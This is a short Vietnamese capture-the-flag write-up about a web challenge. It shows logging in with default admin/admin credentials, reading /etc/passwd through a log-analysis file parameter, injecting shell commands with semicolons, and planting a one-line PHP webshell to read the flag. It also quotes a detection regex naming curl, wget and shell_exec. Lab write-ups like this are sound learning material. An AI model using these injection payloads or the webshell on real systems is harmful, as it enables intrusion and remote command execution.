- Em là newbie mới viết write up mong được các anh chị xem và đánh giá ạ
Đề Bài :
Phân Tích :
-
Khi truy cập mình thấy một windows alert với chức năng để login :
-
Mình thử kiểm tra một số username và password phổ biến : admin/admin , root/root , admin/123456 . Với admin/admin mình đã truy cập được vào hệ thống system monitor
-
Ta thấy có Disk Usage , System Management , Analyze Suspicious Traffic in Log File
-
Điều đặc biệt trong Analyze Suspicious Traffic in Log File các bạn có thể thấy là : Patterns: sql|exec|wget|curl|whoami|system|shell_exec|ls|dir - Đây là các mẫu (regex) được sử dụng để tìm các hoạt động đáng ngờ
-
Tiếp xem The exemple suspicious traffic thì chuyển hướng đến http://103.97.125.56:31915/?whoami với tham số /?whoami và nó đã được ghi trong file access.log
-
Đến đây thì mình chắc bài này liên quan đến os command injection , giờ mình sẽ đi tìm nơi chèn payload
-
Trước tiên mình kiểm tra xem server xử lí giá trị của tham số /?whoami như nào bằng : /?whoami=echo ’ test ’
-
Với kết quả trong file log sẽ ghi lại và không thực thi câu lệnh . Chuyển hướng khai thác nơi khác
-
Các bạn nơi để ý đến khi Analyze thì nó thực hiện chức đọc nội dung trong /var/log/nginx/access.log . Mình sẽ cho lên burp suite và xem có thể đọc file khác không :
-
Thật may mắn là mình có thể thấy nội dung trong /etc/passwd thì đây mình có thể chèn payload command injection
-
Thử : - /etc/passwd ; ls => chỉ có nội dung của file /etc/passwd và không thấy thực thi ls
- /etc/passwd ; echo " test " ; sleep 10 => chỉ phát hiện sự delay 10s và nội dung của file
=> Như vậy mình đoán server sẽ tách payload thành nhiều phần /etc/passwd và sleep 10 , … và thực thi từng câu lệnh nhưng chỉ cho đọc các file có sẵn như /etc/passwd , /var/log/nginx/access.log
Khai thác:
-
Chèn webshell vào hệ thống bằng sử dụng câu lệnh echo " <?php system (\$_GET['cmd']); ?> " > shell.php và thực thi /shell.php?cmd=ls để kiểm tra thấy server đã thực thi :
-
Thật tốt , giờ mình sẽ đọc flag với câu lệnh cmd=cat%20%2fflag*.txt :
